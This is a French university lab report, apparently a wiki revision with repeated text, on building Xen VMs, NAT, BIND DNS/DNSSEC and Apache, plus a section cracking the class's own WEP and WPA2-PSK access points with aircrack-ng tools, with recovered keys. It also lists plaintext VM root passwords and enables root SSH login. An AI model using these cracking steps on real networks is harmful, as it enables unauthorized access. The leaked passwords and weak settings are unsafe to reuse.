xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code> <br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12168
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:36:03Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
